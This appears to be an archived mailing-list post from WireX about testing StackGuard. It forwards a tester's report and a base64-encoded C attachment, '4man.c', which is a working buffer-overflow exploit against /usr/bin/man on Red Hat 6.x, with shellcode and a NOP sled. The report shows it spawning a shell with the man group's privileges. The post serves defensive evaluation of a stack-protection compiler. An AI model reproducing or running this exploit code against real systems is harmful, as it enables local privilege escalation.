"Granquist, Lamont" wrote:
> Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on
> RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it).
> And I'm looking for a little help here. What I've been playing with so
> far is things like the following trying to sort out the parameters of the
> buffer overflow. ... So, anyone got any tips for where to point the RA and
> what the stack
> should look like?
At WireX we've been doing some fresh vulnerability testing. In the attached
e-mail, M.C.Mar <[EMAIL PROTECTED]> describes his work for us
demonstrating an exploit against the man vulnerability, and then
demonstrating that the StackGuarded version of man is not vulnerable.
We are intent on undertaking a continuous evaluation process of testing every
working stack smashing exploit we can find for StackGuard compatible
platforms (x86/Linux, esp. Red Hat). We would appreciate any help we can get
in getting live exploits to actually work. We succeeded with man, but failed
with ircii.
Crispin
-----
Crispin Cowan, CTO, WireX Communications, Inc. http://wirex.com
Free Hardened Linux Distribution: http://immunix.org
JOBS! http://immunix.org/jobs.html
>From - Thu Apr 20 04:46:54 2000
Return-Path: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
Received: from mr1.ipartners.pl (mr1.ipartners.pl [157.25.5.18])
by mithra.wirex.com (Postfix) with ESMTP id 6C3C93EC14
for <[EMAIL PROTECTED]>; Tue, 4 Apr 2000 11:25:20 -0700 (PDT)
Received: from zloty.it.com.pl (zloty.it.com.pl [195.94.200.4])
by mr1.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id UAA83999
for <[EMAIL PROTECTED]>; Tue, 4 Apr 2000 20:23:08 +0200 (CEST)
(envelope-from [EMAIL PROTECTED])
Received: from localhost (woloszyn@localhost)
by zloty.it.com.pl with ESMTP id UAA00373
for <[EMAIL PROTECTED]>; Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
X-Authentication-Warning: zloty.it.com.pl: woloszyn owned process doing -bs
Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
From: "M.C.Mar" <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: Crispin Cowan <[EMAIL PROTECTED]>
Subject: Re: First Penetration Test
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: MULTIPART/DIGEST; BOUNDARY=------------B3356C5E2D4CB4E848D2CED2
Content-ID: <[EMAIL PROTECTED]>
Status:
X-Mozilla-Status: 8011
X-Mozilla-Status2: 00000000
X-UIDL: 3878981500002a3a
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to [EMAIL PROTECTED] for more info.
--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; CHARSET=iso-8859-1
Content-Transfer-Encoding: 8BIT
Content-ID: <[EMAIL PROTECTED]>
OK. I have only two hours today so I started with man.
I compiled vulnerable man sources (man-1.5g-6.src.rpm) with regular
egcs-1.1.2-12.i386 I have installed on my RH 6.0. I Tuned the exploit to
produce shell on my system:
[emsi@pipek ~]$ ./a.out
RET: 0xbffff470 len: 4073
sh:F?F V
° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V
°
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
bash$ id
uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi)
bash$
I attached the exploit.
Then I recompiled the vulnerable code with
gcc-2.7.2.3-14_SGc2_SG121.i386.rpm
and tested StackGuarded code with my explot:
[emsi@pipek ~]$ ./a.out
RET: 0xbffff470 len: 4073
sh:F?F V
° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V
°
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74
in procedure display_cat_file.
As I mentioned at the beginig I have only two hours so I didn't examine the
vulnerable code whether it is posible to exploit the vulnerability
bypassing StacGuard protection.
--
Mariusz Wo³oszyn
Internet Security Specialist, IT -- Internet Partners
E-mail: [EMAIL PROTECTED], [EMAIL PROTECTED]
--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="4man.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[EMAIL PROTECTED]>
Content-Description:
Content-Disposition: attachment; filename="4man.c"
LyoNCiAqIFJld3JpdGVuIGZyb206DQogKiAoYykgMjAwMCBiYWJjaWEgcGFk
bGluYSAvIGIwZg0KICogKGxjYW10dWYncyBpZGVhKQ0KICogYnkgS2lsM3Ig
b2YgTGFtM3JaDQogKiANCiAqIHJlZGhhdCA2LjEgL3Vzci9iaW4vbWFuIGV4
cGxvaXQNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN5
cy9wYXJhbS5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8
c3RyaW5nLmg+DQoNCiNkZWZpbmUgTk9QCQkweDkwDQojZGVmaW5lIE9GUwkJ
MTgwMA0KI2RlZmluZSBCVUZTSVpFCQk0MDE3DQojZGVmaW5lIEFERFJTCQkx
MDAwDQoNCmxvbmcgZ2V0ZXNwKHZvaWQpDQp7DQogICBfX2FzbV9fKCJtb3Zs
ICVlc3AsICVlYXhcbiIpOw0KfQ0KDQppbnQgbWFpbihhcmdjLCBhcmd2KQ0K
aW50IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsNCgljaGFyICpleGVjc2hlbGwg
PQ0KCSJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2
XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KCSJceDg5XHhmM1x4OGRceDRl
XHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgzMVx4ZGJceDg5XHhkOFx4NDBc
eGNkIg0KCSJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0K
CWNoYXIgYnVmW0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCldLCAqcDsNCglp
bnQgbm9wbGVuLCBpLCBvZnM7DQoJbG9uZyByZXQsICphcDsNCg0KCXJldCA9
IGdldGVzcCgpICsgT0ZTOw0KDQoJbWVtc2V0KGJ1ZixOT1AsQlVGU0laRStz
dHJsZW4oZXhlY3NoZWxsKSk7DQoJbWVtY3B5KGJ1ZitCVUZTSVpFLShzdHJs
ZW4oZXhlY3NoZWxsKSsyMCksZXhlY3NoZWxsLHN0cmxlbihleGVjc2hlbGwp
KTsNCg0KCXA9YnVmK0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCktNDsNCglh
cD0oaW50ICopcDsNCgkqYXA9cmV0OyAvLzB4NDY0NjQ2NDY7DQoNCglmcHJp
bnRmKHN0ZGVyciwgIlJFVDogMHgleCAgbGVuOiAlZFxuXG4iLCByZXQsIHN0
cmxlbihidWYpKTsNCg0KCXNldGVudigiTUFOUEFHRVIiLCBidWYsIDEpOw0K
CWV4ZWNsKCIuL21hbiIsICJtYW4iLCAibHMiLCAwKTsNCg0KCXJldHVybiAw
Ow0KfQ0K
--------------B3356C5E2D4CB4E848D2CED2--
